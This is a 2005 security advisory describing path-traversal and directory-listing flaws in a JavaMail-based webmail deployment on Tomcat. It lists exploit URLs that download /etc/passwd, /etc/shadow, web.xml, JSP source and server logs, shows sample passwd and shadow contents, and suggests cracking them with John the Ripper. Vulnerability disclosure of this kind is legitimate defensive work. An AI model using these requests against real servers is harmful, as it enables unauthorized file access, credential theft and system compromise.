Javamail Multiple Information Disclosure Vulnerabilities
May 25, 2005 Yangon, Myanmar.
Vulnerable Systems:
* JavaMail API 1.3
* JavaMail API 1.2
* JavaMail API 1.1.3
Tested on Apache Tomcat/5.0.16
Possibly on all versions of Windows
Failed to restrict to accessing other directory and files in ReadMessage.jsp
File Name:<%=mp.getFileName()%>
Type: <%=abc.getContent_Type()%>
Size: <%=abc.getMsgSize()/1024%>Kb
" target="_new"> download
<%=abc.getFilePath() + "/" + abc.getFileName() %>"
It will give attacker any file on system, because it said getFilePath() + "/" + abc.getFileName()
1. Open specific mailbox attachment
2. Download .jsp source code and configuration information of javamail
3. Target machine Root/Admin Compromise
4. Download server information
1. Open specific mailbox attachment
When user download message from Javamail domain from webmail, attacker may notice URL
http://example.com/docdownloadfile.jsp?f=/var/serviceprovider/web/mailboxesdir/user@example.com/messageid123@user/filename.extension
Then noticed URL lead to /var/folders so tried to switched folders.
http://example.com/var/serviceprovider/web/mailboxesdir/user@example.com/messageid123@user
But got errors. So finally when reached to this URL
http://example.com/mailboxesdir/user@example.com/
It’s made listing of user@example.com attachments are there.
Even unauthorized users are able to view specific mailbox attachment. Attacker need to know only username in order to get attachments listing.
http://example.com/mailboxesdir/user2@example.com/
http://example.com/mailboxesdir/user3@example.com/
2. Download configuration information of javamail
And noticed that docdownloadfile.jsp redirect to where the file are located on server with the Parameter f. actually web browser got the redirect name
http://example.com/Download?/var/serviceprovider/web/mailboxesdir/user@example.com/messageid123@user/filename.extension
This information lead to get web.xml
http://example.com/Download?/var/serviceprovider/web/WEB-INF/web.xml
Which give configuration information of javamail
Download source code of jsp file
http://example.com/Download?/var/serviceprovider/web/login.jsp
http://example.com/Download?/var/serviceprovider/web/messagecontent.jsp
http://example.com/Download?/var/serviceprovider/web/addbook.jsp
http://example.com/Download?/var/serviceprovider/web/compose.jsp
http://example.com/Download?/var/serviceprovider/web/folder.jsp
3. Target machine Root/Admin Compromise
In UNIX /etc/passwd and /etc/shadow are important folder which
A little bit curious and look in web browser typing that
http://example.com/Download?/etc/passwd
example of such a password file is:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
Then Crack Unix password files with John the Ripper.
John can be found practically anywhere. For example: try going to altavista.com and running a search for 'john the ripper'.
http://example.com/Download?/etc/shadow
root:$1$ $WLzQjSmuxB/:133334:0:22222:7:::
adm:*:133334:0:22222:7:::
ftp:*:133334:0:2222:7:::
http://example.com/Download?/etc/group
/etc/group file:
root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:
tty:x:5:
disk:x:6:
lp:x:7:lp
mail:x:8:
news:x:9:
uucp:x:10:
proxy:x:13:
When attacker get information of root/admin user of target server and then attacker can lead to any attack. Attacker may do Website defacement, database altering, stealing and more.
4. Download server information
http://example.com/Download?/var/log/boot.log
http://example.com/Download?/var/log/maillog
And more can be done….
By
Thet Aung Min Latt thetaung@gmail.com
http://thetaung.amyanmar.com